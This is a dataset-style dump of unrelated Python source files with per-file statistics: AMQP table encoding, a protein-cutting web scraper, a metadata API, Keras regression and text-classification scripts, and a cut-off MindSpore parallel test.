# Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model, resnest=use_resnest)
predictor = DefaultPredictor(cfg)
start = time.time()
outputs = predictor(im)
print("Time eplased: {}".format(time.time() - start))
v = Visualizer(im[:, :, ::-1], MetadataCatalog.get(cfg.DATASETS.TRAIN[0]), scale=1.2) #rgb image (::-1)
out = v.draw_instance_predictions(outputs["instances"].to("cpu"))
cv2.imwrite("output.jpg", out.get_image()[:, :, ::-1])
if __name__ == "__main__":
args = parse_args()
start_segment(args)
| 40.283019
| 164
| 0.710539
| 293
| 2,135
| 5.010239
| 0.450512
| 0.066757
| 0.032698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013575
| 0.171897
| 2,135
| 53
| 165
| 40.283019
| 0.816742
| 0.129274
| 0
| 0
| 0
| 0
| 0.165556
| 0.047222
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051282
| false
| 0
| 0.282051
| 0
| 0.358974
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe35e371f2d0a2c205ae69e2ee6c811fd9ed1de5
| 8,916
|
py
|
Python
|
pika/data.py
|
Pankrat/pika
|
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
|
[
"BSD-3-Clause"
] | null | null | null |
pika/data.py
|
Pankrat/pika
|
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
|
[
"BSD-3-Clause"
] | null | null | null |
pika/data.py
|
Pankrat/pika
|
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
|
[
"BSD-3-Clause"
] | null | null | null |
"""AMQP Table Encoding/Decoding"""
import struct
import decimal
import calendar
from datetime import datetime
from pika import exceptions
from pika.compat import unicode_type, PY2, long, as_bytes
def encode_short_string(pieces, value):
"""Encode a string value as short string and append it to pieces list
returning the size of the encoded value.
:param list pieces: Already encoded values
:param value: String value to encode
:type value: str or unicode
:rtype: int
"""
encoded_value = as_bytes(value)
length = len(encoded_value)
# 4.2.5.3
# Short strings, stored as an 8-bit unsigned integer length followed by zero
# or more octets of data. Short strings can carry up to 255 octets of UTF-8
# data, but may not contain binary zero octets.
# ...
# 4.2.5.5
# The server SHOULD validate field names and upon receiving an invalid field
# name, it SHOULD signal a connection exception with reply code 503 (syntax
# error).
# -> validate length (avoid truncated utf-8 / corrupted data), but skip null
# byte check.
if length > 255:
raise exceptions.ShortStringTooLong(encoded_value)
pieces.append(struct.pack('B', length))
pieces.append(encoded_value)
return 1 + length
if PY2:
def decode_short_string(encoded, offset):
"""Decode a short string value from ``encoded`` data at ``offset``.
"""
length = struct.unpack_from('B', encoded, offset)[0]
offset += 1
# Purely for compatibility with original python2 code. No idea what
# and why this does.
value = encoded[offset:offset + length]
try:
value = bytes(value)
except UnicodeEncodeError:
pass
offset += length
return value, offset
else:
def decode_short_string(encoded, offset):
"""Decode a short string value from ``encoded`` data at ``offset``.
"""
length = struct.unpack_from('B', encoded, offset)[0]
offset += 1
value = encoded[offset:offset + length].decode('utf8')
offset += length
return value, offset
def encode_table(pieces, table):
"""Encode a dict as an AMQP table appending the encded table to the
pieces list passed in.
:param list pieces: Already encoded frame pieces
:param dict table: The dict to encode
:rtype: int
"""
table = table or {}
length_index = len(pieces)
pieces.append(None) # placeholder
tablesize = 0
for (key, value) in table.items():
tablesize += encode_short_string(pieces, key)
tablesize += encode_value(pieces, value)
pieces[length_index] = struct.pack('>I', tablesize)
return tablesize + 4
def encode_value(pieces, value):
"""Encode the value passed in and append it to the pieces list returning
the the size of the encoded value.
:param list pieces: Already encoded values
:param any value: The value to encode
:rtype: int
"""
if PY2:
if isinstance(value, basestring):
if isinstance(value, unicode_type):
value = value.encode('utf-8')
pieces.append(struct.pack('>cI', b'S', len(value)))
pieces.append(value)
return 5 + len(value)
else:
# support only str on Python 3
if isinstance(value, str):
value = value.encode('utf-8')
pieces.append(struct.pack('>cI', b'S', len(value)))
pieces.append(value)
return 5 + len(value)
if isinstance(value, bool):
pieces.append(struct.pack('>cB', b't', int(value)))
return 2
if isinstance(value, long):
pieces.append(struct.pack('>cq', b'l', value))
return 9
elif isinstance(value, int):
pieces.append(struct.pack('>ci', b'I', value))
return 5
elif isinstance(value, decimal.Decimal):
value = value.normalize()
if value.as_tuple().exponent < 0:
decimals = -value.as_tuple().exponent
raw = int(value * (decimal.Decimal(10) ** decimals))
pieces.append(struct.pack('>cBi', b'D', decimals, raw))
else:
# per spec, the "decimals" octet is unsigned (!)
pieces.append(struct.pack('>cBi', b'D', 0, int(value)))
return 6
elif isinstance(value, datetime):
pieces.append(struct.pack('>cQ', b'T',
calendar.timegm(value.utctimetuple())))
return 9
elif isinstance(value, dict):
pieces.append(struct.pack('>c', b'F'))
return 1 + encode_table(pieces, value)
elif isinstance(value, list):
p = []
for v in value:
encode_value(p, v)
piece = b''.join(p)
pieces.append(struct.pack('>cI', b'A', len(piece)))
pieces.append(piece)
return 5 + len(piece)
elif value is None:
pieces.append(struct.pack('>c', b'V'))
return 1
else:
raise exceptions.UnsupportedAMQPFieldException(pieces, value)
def decode_table(encoded, offset):
"""Decode the AMQP table passed in from the encoded value returning the
decoded result and the number of bytes read plus the offset.
:param str encoded: The binary encoded data to decode
:param int offset: The starting byte offset
:rtype: tuple
"""
result = {}
tablesize = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
limit = offset + tablesize
while offset < limit:
key, offset = decode_short_string(encoded, offset)
value, offset = decode_value(encoded, offset)
result[key] = value
return result, offset
def decode_value(encoded, offset):
"""Decode the value passed in returning the decoded value and the number
of bytes read in addition to the starting offset.
:param str encoded: The binary encoded data to decode
:param int offset: The starting byte offset
:rtype: tuple
:raises: pika.exceptions.InvalidFieldTypeException
"""
# slice to get bytes in Python 3 and str in Python 2
kind = encoded[offset:offset + 1]
offset += 1
# Bool
if kind == b't':
value = struct.unpack_from('>B', encoded, offset)[0]
value = bool(value)
offset += 1
# Short-Short Int
elif kind == b'b':
value = struct.unpack_from('>B', encoded, offset)[0]
offset += 1
# Short-Short Unsigned Int
elif kind == b'B':
value = struct.unpack_from('>b', encoded, offset)[0]
offset += 1
# Short Int
elif kind == b'U':
value = struct.unpack_from('>h', encoded, offset)[0]
offset += 2
# Short Unsigned Int
elif kind == b'u':
value = struct.unpack_from('>H', encoded, offset)[0]
offset += 2
# Long Int
elif kind == b'I':
value = struct.unpack_from('>i', encoded, offset)[0]
offset += 4
# Long Unsigned Int
elif kind == b'i':
value = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
# Long-Long Int
elif kind == b'L':
value = long(struct.unpack_from('>q', encoded, offset)[0])
offset += 8
# Long-Long Unsigned Int
elif kind == b'l':
value = long(struct.unpack_from('>Q', encoded, offset)[0])
offset += 8
# Float
elif kind == b'f':
value = long(struct.unpack_from('>f', encoded, offset)[0])
offset += 4
# Double
elif kind == b'd':
value = long(struct.unpack_from('>d', encoded, offset)[0])
offset += 8
# Decimal
elif kind == b'D':
decimals = struct.unpack_from('B', encoded, offset)[0]
offset += 1
raw = struct.unpack_from('>i', encoded, offset)[0]
offset += 4
value = decimal.Decimal(raw) * (decimal.Decimal(10) ** -decimals)
# Short String
elif kind == b's':
value, offset = decode_short_string(encoded, offset)
# Long String
elif kind == b'S':
length = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
value = encoded[offset:offset + length].decode('utf8')
offset += length
# Field Array
elif kind == b'A':
length = struct.unpack_from('>I', encoded, offset)[0]
offset += 4
offset_end = offset + length
value = []
while offset < offset_end:
v, offset = decode_value(encoded, offset)
value.append(v)
# Timestamp
elif kind == b'T':
value = datetime.utcfromtimestamp(struct.unpack_from('>Q', encoded,
offset)[0])
offset += 8
# Field Table
elif kind == b'F':
(value, offset) = decode_table(encoded, offset)
# Null / Void
elif kind == b'V':
value = None
else:
raise exceptions.InvalidFieldTypeException(kind)
return value, offset
| 30.534247
| 80
| 0.596456
| 1,137
| 8,916
| 4.628848
| 0.176781
| 0.079042
| 0.057762
| 0.068402
| 0.444233
| 0.372221
| 0.312939
| 0.302679
| 0.295839
| 0.255368
| 0
| 0.014191
| 0.288694
| 8,916
| 291
| 81
| 30.639175
| 0.815673
| 0.250561
| 0
| 0.306358
| 0
| 0
| 0.018185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040462
| false
| 0.00578
| 0.034682
| 0
| 0.16763
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe372dac70d64a37ad3e688bb47fa5b1bd4ad42e
| 528
|
py
|
Python
|
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
|
Agi-dev/pylaas_core
|
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
|
[
"MIT"
] | null | null | null |
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
|
Agi-dev/pylaas_core
|
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
|
[
"MIT"
] | 2
|
2021-03-25T21:30:41.000Z
|
2021-06-01T21:25:37.000Z
|
tests/fixtures/data_sets/service/dummy/dummy_configurable.py
|
Agi-dev/pylaas_core
|
c44866b5e57eb6f05f5b2b8d731f22d62a8c01c2
|
[
"MIT"
] | null | null | null |
from pylaas_core.abstract.abstract_service import AbstractService
import time
from pylaas_core.interface.technical.container_configurable_aware_interface import ContainerConfigurableAwareInterface
class DummyConfigurable(AbstractService, ContainerConfigurableAwareInterface):
def __init__(self) -> None:
super().__init__()
self._microtime = int(round(time.time() * 1000))
self._configs = None
def set_configs(self, configurations):
self._configs = configurations
return self
| 31.058824
| 118
| 0.765152
| 51
| 528
| 7.568627
| 0.568627
| 0.051813
| 0.072539
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00907
| 0.164773
| 528
| 16
| 119
| 33
| 0.866213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.272727
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3be5e4c8643dd88fcaa6473267f6ae2cf76961
| 1,706
|
py
|
Python
|
examples/peptidecutter/advanced.py
|
zjuchenyuan/EasyLogin
|
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
|
[
"MIT"
] | 33
|
2016-12-01T01:33:31.000Z
|
2021-05-12T03:32:27.000Z
|
examples/peptidecutter/advanced.py
|
zjuchenyuan/EasyLogin
|
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
|
[
"MIT"
] | 2
|
2018-04-26T06:58:29.000Z
|
2020-01-11T15:18:14.000Z
|
examples/peptidecutter/advanced.py
|
zjuchenyuan/EasyLogin
|
acc67187d902f20ec64d2d6b9eeb953e2a0ac77d
|
[
"MIT"
] | 4
|
2017-02-24T11:08:45.000Z
|
2021-01-13T16:00:33.000Z
|
from EasyLogin import EasyLogin
from pprint import pprint
def peptidecutter(oneprotein):
a = EasyLogin(proxy="socks5://127.0.0.1:1080") #speed up by using proxy
a.post("http://web.expasy.org/cgi-bin/peptide_cutter/peptidecutter.pl",
"protein={}&enzyme_number=all_enzymes&special_enzyme=Chym&min_prob=&block_size=60&alphtable=alphtable&cleave_number=all&cleave_exactly=&cleave_range_min=&cleave_range_max=".format(oneprotein)
)
table=a.b.find("table",{"class":"proteomics2"})
tds=table.find_all("td")
result = []
oneline = []
i = 0
for td in tds:
i+=1
if i==1:
content = td.text
elif i==2:
content = int(td.text)
else:
content = [int(i) for i in td.text.split()]
oneline.append(content)
if i==3:
result.append(oneline)
oneline=[]
i=0
return result
def fasta_reader(filename):
filecontents = open(filename).read().split("\n")
name = ""
thedata = ""
result=[]
for line in filecontents:
if not len(line): continue
if line[0]=='>':
if len(thedata):
result.append([name,thedata])
thedata = ""
name = line
else:
thedata += line
result.append([name,thedata])#don't forget the last one
return result
def peptidecutter_more(filename):
return [ [name,peptidecutter(oneprotein)] for name,oneprotein in fasta_reader(filename) ]
if __name__ == "__main__":
#pprint(peptidecutter("SERVELAT"))
import sys
pprint(peptidecutter_more(sys.argv[1]))
| 30.464286
| 200
| 0.579132
| 203
| 1,706
| 4.743842
| 0.458128
| 0.018692
| 0.018692
| 0.047767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018257
| 0.293669
| 1,706
| 55
| 201
| 31.018182
| 0.780913
| 0.047479
| 0
| 0.297872
| 0
| 0.021277
| 0.183908
| 0.123244
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.06383
| 0.021277
| 0.191489
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3e731bfc56815773233eb7a914918e37d052e2
| 974
|
py
|
Python
|
metadata_service/api/popular_tables.py
|
worldwise001/amundsenmetadatalibrary
|
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
|
[
"Apache-2.0"
] | null | null | null |
metadata_service/api/popular_tables.py
|
worldwise001/amundsenmetadatalibrary
|
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
|
[
"Apache-2.0"
] | 1
|
2019-09-21T23:59:46.000Z
|
2019-09-21T23:59:46.000Z
|
metadata_service/api/popular_tables.py
|
worldwise001/amundsenmetadatalibrary
|
9914c8b51d38b8bd76d3249eb4f7fcce3e198d09
|
[
"Apache-2.0"
] | 1
|
2019-09-21T23:56:40.000Z
|
2019-09-21T23:56:40.000Z
|
from http import HTTPStatus
from typing import Iterable, Union, Mapping
from flask import request
from flask_restful import Resource, fields, marshal
from metadata_service.proxy import get_proxy_client
popular_table_fields = {
'database': fields.String,
'cluster': fields.String,
'schema': fields.String,
'table_name': fields.String(attribute='name'),
'table_description': fields.String(attribute='description'), # Optional
}
popular_tables_fields = {
'popular_tables': fields.List(fields.Nested(popular_table_fields))
}
class PopularTablesAPI(Resource):
"""
PopularTables API
"""
def __init__(self) -> None:
self.client = get_proxy_client()
def get(self) -> Iterable[Union[Mapping, int, None]]:
limit = request.args.get('limit', 10)
popular_tables = self.client.get_popular_tables(num_entries=limit)
return marshal({'popular_tables': popular_tables}, popular_tables_fields), HTTPStatus.OK
| 29.515152
| 96
| 0.722793
| 115
| 974
| 5.886957
| 0.417391
| 0.134417
| 0.084195
| 0.076809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00246
| 0.165298
| 974
| 32
| 97
| 30.4375
| 0.830258
| 0.027721
| 0
| 0
| 0
| 0
| 0.103115
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.227273
| 0
| 0.409091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe3ee793457d0725edb13bd4a978ffe58340aff1
| 11,708
|
py
|
Python
|
others/Keras_custom_error.py
|
rahasayantan/Work-For-Reference
|
e052da538df84034ec5a0fe3b19c4287de307286
|
[
"MIT"
] | null | null | null |
others/Keras_custom_error.py
|
rahasayantan/Work-For-Reference
|
e052da538df84034ec5a0fe3b19c4287de307286
|
[
"MIT"
] | null | null | null |
others/Keras_custom_error.py
|
rahasayantan/Work-For-Reference
|
e052da538df84034ec5a0fe3b19c4287de307286
|
[
"MIT"
] | null | null | null |
# define custom R2 metrics for Keras backend
from keras import backend as K
def r2_keras(y_true, y_pred):
SS_res = K.sum(K.square( y_true - y_pred ))
SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
return ( 1 - SS_res/(SS_tot + K.epsilon()) )
# base model architecture definition
def model():
model = Sequential()
#input layer
model.add(Dense(input_dims, input_dim=input_dims))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dropout(0.3))
# hidden layers
model.add(Dense(input_dims))
model.add(BatchNormalization())
model.add(Activation(act_func))
model.add(Dropout(0.3))
model.add(Dense(input_dims//2))
model.add(BatchNormalization())
model.add(Activation(act_func))
model.add(Dropout(0.3))
model.add(Dense(input_dims//4, activation=act_func))
# output layer (y_pred)
model.add(Dense(1, activation='linear'))
# compile this model
model.compile(loss='mean_squared_error', # one may use 'mean_absolute_error' as alternative
optimizer='adam',
metrics=[r2_keras] # you can add several if needed
)
# Visualize NN architecture
print(model.summary())
return model
################K2
import pandas as pd
import numpy as np
from sklearn.feature_selection import SelectFromModel
from sklearn.linear_model import LassoCV
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import RobustScaler
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, InputLayer, GaussianNoise
from keras.wrappers.scikit_learn import KerasRegressor
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
#
# Data preparation
#
y_train = train['y'].values
id_test = test['ID']
num_train = len(train)
df_all = pd.concat([train, test])
df_all.drop(['ID', 'y'], axis=1, inplace=True)
# One-hot encoding of categorical/strings
df_all = pd.get_dummies(df_all, drop_first=True)
# Sscaling features
scaler = RobustScaler()
df_all = scaler.fit_transform(df_all)
train = df_all[:num_train]
test = df_all[num_train:]
# Keep only the most contributing features
sfm = SelectFromModel(LassoCV())
sfm.fit(train, y_train)
train = sfm.transform(train)
test = sfm.transform(test)
print ('Number of features : %d' % train.shape[1])
def r2_keras(y_true, y_pred):
SS_res = K.sum(K.square( y_true - y_pred ))
SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
return ( 1 - SS_res/(SS_tot + K.epsilon()) )
def build_model_fn(neurons=20, noise=0.25):
model = Sequential()
model.add(InputLayer(input_shape=(train.shape[1],)))
model.add(GaussianNoise(noise))
model.add(Dense(neurons, activation='tanh'))
model.add(Dense(1, activation='linear'))
model.compile(loss='mean_squared_error', optimizer='nadam', metrics=[r2_keras])
return model
#
# Tuning model parameters
#
model = KerasRegressor(build_fn=build_model_fn, epochs=75, verbose=0)
gsc = GridSearchCV(
estimator=model,
param_grid={
#'neurons': range(18,31,4),
'noise': [x/20.0 for x in range(3, 7)],
},
#scoring='r2',
scoring='neg_mean_squared_error',
cv=5
)
grid_result = gsc.fit(train, y_train)
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
for test_mean, test_stdev, train_mean, train_stdev, param in zip(
grid_result.cv_results_['mean_test_score'],
grid_result.cv_results_['std_test_score'],
grid_result.cv_results_['mean_train_score'],
grid_result.cv_results_['std_train_score'],
grid_result.cv_results_['params']):
print("Train: %f (%f) // Test : %f (%f) with: %r" % (train_mean, train_stdev, test_mean, test_stdev, param))
#
# Train model with best params for submission
#
model = build_model_fn(**grid_result.best_params_)
model.fit(train, y_train, epochs=75, verbose=2)
y_test = model.predict(test).flatten()
df_sub = pd.DataFrame({'ID': id_test, 'y': y_test})
df_sub.to_csv('mercedes-submission.csv', index=False)
#########################
import pandas as pd
import numpy as np
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn.decomposition import PCA, FastICA
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import make_pipeline, Pipeline, _name_estimators
from sklearn.linear_model import ElasticNet, ElasticNetCV
from sklearn.model_selection import cross_val_score, KFold
from sklearn.metrics import r2_score
from sklearn.base import BaseEstimator, TransformerMixin
import xgboost as xgb
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
y_train = train['y'].values
y_mean = np.mean(y_train)
id_test = test['ID']
num_train = len(train)
df_all = pd.concat([train, test])
df_all.drop(['ID', 'y'], axis=1, inplace=True)
# One-hot encoding of categorical/strings
df_all = pd.get_dummies(df_all, drop_first=True)
train = df_all[:num_train]
test = df_all[num_train:]
class AddColumns(BaseEstimator, TransformerMixin):
def __init__(self, transform_=None):
self.transform_ = transform_
def fit(self, X, y=None):
self.transform_.fit(X, y)
return self
def transform(self, X, y=None):
xform_data = self.transform_.transform(X, y)
return np.append(X, xform_data, axis=1)
class LogExpPipeline(Pipeline):
def fit(self, X, y):
super(LogExpPipeline, self).fit(X, np.log1p(y))
def predict(self, X):
return np.expm1(super(LogExpPipeline, self).predict(X))
#
# Model/pipeline with scaling,pca,svm
#
svm_pipe = LogExpPipeline(_name_estimators([RobustScaler(),
PCA(),
SVR(kernel='rbf', C=1.0, epsilon=0.05)]))
# results = cross_val_score(svm_pipe, train, y_train, cv=5, scoring='r2')
# print("SVM score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()
#
# Model/pipeline with scaling,pca,ElasticNet
#
en_pipe = LogExpPipeline(_name_estimators([RobustScaler(),
PCA(n_components=125),
ElasticNet(alpha=0.001, l1_ratio=0.1)]))
#
# XGBoost model
#
xgb_model = xgb.sklearn.XGBRegressor(max_depth=4, learning_rate=0.005, subsample=0.921,
objective='reg:linear', n_estimators=1300, base_score=y_mean)
xgb_pipe = Pipeline(_name_estimators([AddColumns(transform_=PCA(n_components=10)),
AddColumns(transform_=FastICA(n_components=10, max_iter=500)),
xgb_model]))
# results = cross_val_score(xgb_model, train, y_train, cv=5, scoring='r2')
# print("XGB score: %.4f (%.4f)" % (results.mean(), results.std()))
#
# Random Forest
#
rf_model = RandomForestRegressor(n_estimators=250, n_jobs=4, min_samples_split=25,
min_samples_leaf=25, max_depth=3)
# results = cross_val_score(rf_model, train, y_train, cv=5, scoring='r2')
# print("RF score: %.4f (%.4f)" % (results.mean(), results.std()))
#
# Now the training and stacking part. In previous version i just tried to train each model and
# find the best combination, that lead to a horrible score (Overfit?). Code below does out-of-fold
# training/predictions and then we combine the final results.
#
# Read here for more explanation (This code was borrowed/adapted) :
#
class Ensemble(object):
def __init__(self, n_splits, stacker, base_models):
self.n_splits = n_splits
self.stacker = stacker
self.base_models = base_models
def fit_predict(self, X, y, T):
X = np.array(X)
y = np.array(y)
T = np.array(T)
folds = list(KFold(n_splits=self.n_splits, shuffle=True, random_state=2016).split(X, y))
S_train = np.zeros((X.shape[0], len(self.base_models)))
S_test = np.zeros((T.shape[0], len(self.base_models)))
for i, clf in enumerate(self.base_models):
S_test_i = np.zeros((T.shape[0], self.n_splits))
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
y_train = y[train_idx]
X_holdout = X[test_idx]
y_holdout = y[test_idx]
clf.fit(X_train, y_train)
y_pred = clf.predict(X_holdout)[:]
print ("Model %d fold %d score %f" % (i, j, r2_score(y_holdout, y_pred)))
S_train[test_idx, i] = y_pred
S_test_i[:, j] = clf.predict(T)[:]
S_test[:, i] = S_test_i.mean(axis=1)
# results = cross_val_score(self.stacker, S_train, y, cv=5, scoring='r2')
# print("Stacker score: %.4f (%.4f)" % (results.mean(), results.std()))
# exit()
self.stacker.fit(S_train, y)
res = self.stacker.predict(S_test)[:]
return res
stack = Ensemble(n_splits=5,
#stacker=ElasticNetCV(l1_ratio=[x/10.0 for x in range(1,10)]),
stacker=ElasticNet(l1_ratio=0.1, alpha=1.4),
base_models=(svm_pipe, en_pipe, xgb_pipe, rf_model))
y_test = stack.fit_predict(train, y_train, test)
df_sub = pd.DataFrame({'ID': id_test, 'y': y_test})
df_sub.to_csv('submission.csv', index=False)
#############################
'''This example demonstrates the use of Convolution1D for text classification.
Gets to 0.89 test accuracy after 2 epochs.
90s/epoch on Intel i5 2.4Ghz CPU.
10s/epoch on Tesla K40 GPU.
'''
from __future__ import print_function
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.datasets import imdb
# set parameters:
max_features = 5000
maxlen = 400
batch_size = 32
embedding_dims = 50
filters = 250
kernel_size = 3
hidden_dims = 250
epochs = 2
print('Loading data...')
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
print(len(x_train), 'train sequences')
print(len(x_test), 'test sequences')
print('Pad sequences (samples x time)')
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
print('x_train shape:', x_train.shape)
print('x_test shape:', x_test.shape)
print('Build model...')
model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features,
embedding_dims,
input_length=maxlen))
model.add(Dropout(0.2))
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
model.add(Conv1D(filters,
kernel_size,
padding='valid',
activation='relu',
strides=1))
# we use max pooling:
model.add(GlobalMaxPooling1D())
# We add a vanilla hidden layer:
model.add(Dense(hidden_dims))
model.add(Dropout(0.2))
model.add(Activation('relu'))
# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test))
| 31.643243
| 112
| 0.656389
| 1,642
| 11,708
| 4.488429
| 0.227162
| 0.029308
| 0.016418
| 0.010855
| 0.325373
| 0.262687
| 0.191859
| 0.183718
| 0.16228
| 0.153324
| 0
| 0.019026
| 0.214383
| 11,708
| 369
| 113
| 31.728997
| 0.782235
| 0.162965
| 0
| 0.276018
| 0
| 0
| 0.059916
| 0.004747
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049774
| false
| 0
| 0.135747
| 0.004525
| 0.235294
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4036ba021d5a543848f0719df15257dc0be8cd
| 7,239
|
py
|
Python
|
tests/ut/python/parallel/test_manual_gatherv2.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/ut/python/parallel/test_manual_gatherv2.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/ut/python/parallel/test_manual_gatherv2.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore as ms
from mindspore import context, Tensor, Parameter
from mindspore.common.api import _cell_graph_executor
from mindspore.nn import Cell, TrainOneStepCell, Momentum
from mindspore.ops import operations as P
from mindspore.common.initializer import initializer
class Net(Cell):
def __init__(self,
strategy1=None,
strategy2=None,
strategy3=None,
axis=0,
init_flag=True,
split_tuple=(4, 4),
split_string="manual_split",
param_shape=(8, 8)):
super().__init__()
self.gatherv2 = P.Gather().shard(strategy1)
self.gatherv2.add_prim_attr(split_string, split_tuple)
self.mul = P.Mul().shard(strategy2)
self.reshape = P.Reshape()
self.matmul = P.MatMul().shard(strategy3)
self.matmul.add_prim_attr("forward_reduce_scatter", True)
if init_flag:
self.param = Parameter(initializer("ones", param_shape, ms.float32), name="gatherv2_param")
else:
self.param = Parameter(Tensor(np.ones(param_shape), dtype=ms.float32), name="gatherv2_param")
self.mul_weight = Parameter(initializer("ones", (8, 8, 8), ms.float32), name="mul_weight")
self.matmul_weight = Parameter(initializer("ones", (64, 16), ms.float32), name="matmul_weight")
self.axis = axis
def construct(self, x, b):
out = self.gatherv2(self.param, x, self.axis)
out = self.mul(out, self.mul_weight)
out = self.reshape(out, (8, 64))
out = self.matmul(out, self.matmul_weight)
return out
_x = Tensor(np.ones([8, 8]), dtype=ms.int32)
_b = Tensor(np.ones([64, 8]), dtype=ms.float32)
def compile_net(net):
optimizer = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
train_net = TrainOneStepCell(net, optimizer)
train_net.set_auto_parallel()
train_net.set_train()
_cell_graph_executor.compile(train_net, _x, _b, auto_parallel_mode=True)
context.reset_auto_parallel_context()
def test_normal_split():
